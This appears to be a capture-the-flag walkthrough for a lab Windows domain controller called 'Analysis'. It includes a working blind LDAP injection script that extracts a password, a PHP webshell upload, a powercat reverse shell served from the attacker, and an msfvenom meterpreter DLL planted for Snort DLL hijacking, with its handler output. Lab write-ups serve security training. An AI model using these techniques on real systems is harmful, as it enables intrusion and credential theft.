This is a Windows Server 2019 machine that hosts a web application used by a group of SOC analysts for network and incident monitoring purposes. Access to the web application is gained using ASREPRoast bruteforce and LDAP blind injection attacks. Once inside the analysts web dashboard, the report upload feature is abused to transfer a PHP reverse shell in the server, since no upload filters are in place. For the system escalation part, a DLL hijacking vulnerability affecting the Snort IT monitoring tool is exploited.
> nmap $target -p- -T4 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-20 17:24 EST
Host is up, received user-set (0.055s latency).
Not shown: 65083 closed tcp ports (conn-refused), 423 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
3306/tcp open mysql syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
33060/tcp open mysqlx syn-ack
47001/tcp open winrm syn-ack
49664/tcp open unknown syn-ack
49665/tcp open unknown syn-ack
49666/tcp open unknown syn-ack
49667/tcp open unknown syn-ack
49669/tcp open unknown syn-ack
49670/tcp open unknown syn-ack
49671/tcp open unknown syn-ack
49674/tcp open unknown syn-ack
49675/tcp open unknown syn-ack
49692/tcp open unknown syn-ack
49705/tcp open unknown syn-ack
52650/tcp open unknown syn-ack
Nmap done: 1 IP address (1 host up) scanned in 615.43 seconds
Looks like a Windows domain controller. Enumerate the open ports.
> nmap $target -p53,80,88,135,139,445,464,593,636,3268,3269,3306,5985,9389,33060,47001 -sV -sC -Pn -vv
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-20 17:42 EST
Host is up, received user-set (0.045s latency).
Scanned at 2024-01-20 17:42:18 EST for 54s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-01-20 22:43:13Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3306/tcp open mysql syn-ack MySQL (unauthorized)
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
33060/tcp open mysqlx? syn-ack
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.93%I=7%D=1/20%Time=65AC4C55%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOptions,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%
SF:r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVersionBindReqTCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2B,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message
SF:\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SSLSessionReq,
SF:2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0f
SF:Invalid\x20message\"\x05HY000")%r(TerminalServerCookie,9,"\x05\0\0\0\x0
SF:b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\
SF:0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(Ker
SF:beros,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x
SF:01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(FourOhFour
SF:Request,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0
SF:\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(LDAP
SF:BindReq,46,"\x05\0\0\0\x0b\x08\x05\x1a\x009\0\0\0\x01\x08\x01\x10\x88'\
SF:x1a\*Parse\x20error\x20unserializing\x20protobuf\x20message\"\x05HY000"
SF:)%r(SIPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TerminalServer,9,"\x
SF:05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(
SF:NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88
SF:'\x1a\x0fInvalid\x20message\"\x05HY000")%r(JavaRMI,9,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(oracle-t
SF:ns,32,"\x05\0\0\0\x0b\x08\x05\x1a\0%\0\0\0\x01\x08\x01\x10\x88'\x1a\x16
SF:Invalid\x20message-frame\.\"\x05HY000")%r(ms-sql-s,9,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\
SF:x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(giop,9,"\x05\0\0\
SF:0\x0b\x08\x05\x1a\0");
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 64736/tcp): CLEAN (Couldn't connect)
| Check 2 (port 7365/tcp): CLEAN (Couldn't connect)
| Check 3 (port 44409/udp): CLEAN (Failed to receive data)
| Check 4 (port 9653/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 49s
| smb2-time:
| date: 2024-01-20T22:43:49
|_ start_date: N/A
Nmap done: 1 IP address (1 host up) scanned in 54.67 seconds
If we browse this site with Firefox we receive an error: "Missing parameter".
Let's find out which is that missing parameter the application is expecting. Capture the request with Burpsuite, right-click and save to file request.txt, then edit the text file marking the fields to fuzz with ffuf
GET /users/list.php?FUZZ HTTP/1.1
Host: internal.analysis.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Launch ffuf with the text file as argument to find the parameter.
So it seems the application is expecting parameter called name. Check it with Firefox.
It seems the application is taking user input in the parameter name and using it to launch a query against a database to fetch user data. Then the retrieved data is presented in the web page.
At this point we can consider enumeration finished as we have found everything we need to begin exploitation. Wrapping up, this is what we have found:
The host is a domain controller, and domain name is analysis.htb
In the internal subdomain, there is another site at http://internal.analysis.htb/users/list.php where users can query a database by means of a parameter called name. According to the list of services running, this database should be MySQL or LDAP.
USER
The employees login portal could be an entry point, but we need at least a list of valid usernames. Two options that come to mind to bruteforce usernames are an ASREPRoast attack or an RID bruteforce. Since we do not have SMB credentials, we will opt for ASREPRoast.
Two tools we can use to bruteforce usernames are GetNPUsers.py or Kerbrute. In summary, both of send a TGT request with no pre-authentication and check the KDC reply. If the user exists, the KDC will prompt pre-authentication; if not, it will reply with an user not found message. Therefore, we can find out which usernames exist and which ones not.
With GetNPUsers.py, launch an ASREPRoast attack and grep the results.
It is able to dump the usernames but takes a lot of time. There is a faster tool for this purpose called Kerbrute which essentially does the same: initiate a no-preauth TGT request and checks what the KDC replies.
In any case, both methods return the same list of usernames. Testing them in the web site we discover the only username which is returning data in the name parameter is technician
Now let's analyze what could be happening in the backend. It seems it is taking user input in the parameter name and using it to query a database which must be either MySQL or LDAP. Therefore, this parameter could be vulnerable to injections.
Let's verify first if the parameter is injectable in MySQL with sqlmap
The tool reports the parameter does not seem to be injectable in MySQL.
[08:44:26] [WARNING] GET parameter 'name' does not seem to be injectable
[08:44:26] [CRITICAL] all tested parameters do not appear to be injectable.
The other option to try is LDAP injection. For this we need to find out which LDAP attributes are present in the database for user technician. This can be done fuzzing LDAP with Burpsuite.
To fuzz the application, choose a payload and capture the request with Burpsuite, then send the request to intruder. In this case, the payload used is this one:
Finally, according to our enumeration findings, we know the LDAP query is successful when the technician data is showed in the web site. Therefore, we will know if an LDAP attribute exists when the word "technician" is in the HTTP response. Configure the Burpsuite grep match to mark HTTP responses containing this word.
Run the attack and verify the responses containing the word "technician" in the results.
We notice all the attributes found are common in Active Directory except for the attribute description. This is optional and sometimes is used by system admins to add additional information such as passwords.
To dump the contents of the technician attribute description we will use a blind LDAP injection attack (https://book.hacktricks.xyz/pentesting-web/ldap-injection#blind-ldap-injection). Iterating over ASCII characters, and knowing the OK/NOK criteria (in this case, whether the response contains the text "technician" or not), we can dump the field contents. The method is similar to the process of a blind SQL injection.
The proposed blind LDAP injection script in Python to bruteforce the technician description field is the following:
#!/usr/bin/python3
import requests
import string
dictionary=string.digits+string.ascii_lowercase+string.ascii_uppercase+'@'+'.'+'#'+'$'+'%'+'&'+'*'
pattern="http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description={FUZZPASS}{FUZZCHAR}*)"
password=""
run=True
print("\n[+] Running stuff...\n")
while run==True:
run=False
pattern="http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description={FUZZPASS}{FUZZCHAR}*)"
for char in dictionary:
if char=='*':
pattern="http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description={FUZZPASS}{FUZZCHAR})"
url=pattern.replace("{FUZZCHAR}",char).replace("{FUZZPASS}",password)
response=requests.get(url)
if "technician" in response.text:
print("[+] Char found:",password+char)
password+=char
run=True
break
print("\n[+] Removing trailing characters...")
if password[-1]=='*':
password=password.rstrip('*')
print("\n[+] Password found: ",password)
There are 2 things to remark:
Since we are using wildcards in the pattern URL, we have to take into account the case an asterisk (*) is used in the middle of the password.
Because of the same reason, there will always be an asterisk at the end of the password found (a trailing character). Bear in mind trailing characters must be removed at the end of the password before finishing the process.
The description field looks like a password. Let's try credential technician@analysis.htb:97NTtl*4QP96Bv in the employees portal to login into the SOC dashboard.
Once inside the web application, we can upload a PHP reverse shell by abusing the SOC report feature, since there is no upload filter in place. The shell used is this one:
Which can be found in Kali location /usr/share/webshells/php/simple-backdoor.php. Just upload the file and inspect the traffic with Burpsuite. The HTTP response contains the upload path.
In fact, the upload path is /dashboard/uploads/simple.php
Use this PHP shell to send a reverse shell to our Kali machine with powercat. Serve powercat.ps1 with a Python HTTP server, then download and execute from memory using Powershell's downloadstrings. The payload to use is:
Remember to URL encode to avoid problematic characters in the URL.
A reverse shell is received on port 1919. Although it is not valid to dump user flag, we can enumerate the system from it.
> systeminfo
Nom de l'hôte: DC-ANALYSIS
Nom du système d'exploitation: Microsoft Windows Server 2019 Standard
Version du système: 10.0.17763 N/A version 17763
Type du système: x64-based PC
After enumeration, we find out the password of user jdoe is configured in the winlogon registry key. We retrieve it by means of a registry query.
According to them, to exploit the vulnerability we are supposed to place in a remote shared folder a malicious tcapi.dll along with a .pcap capture file in the same folder. Then run Snort and let the application load the malicious DLL. Unfortunately, this procedure was tested and did not work.
Enumerating further in the Snort folder, we find a configuration file at C:\Snort\bin\snort.conf containing information about pre-processor libraries.
In summary, it seems Snort load first dynamic DLL's located at the pre-processor path c:\Snort\lib\snort_dynamicpreprocessor
Create an msfvenom payload for a malicious DLL called sf_engine.dll and copy to c:\snort\lib\snort_dynamicpreprocessor
> msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.xxx.xxx lport=1919 -f dll -a x64 --platform windows -o sf_engine.dll
Now start a meterpreter handler and configure as needed.
> msfconsole -q
[*] Starting persistent handler(s)...
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set lhost tun0
lhost => 10.10.
msf6 exploit(multi/handler) > set lport 1919
lport => 1919
msf6 exploit(multi/handler) > exploit
Shortly after the DLL file is copied into the Snort pre-processor folder, a meterpreter session 1 is opened under the analysis\administrateur context.
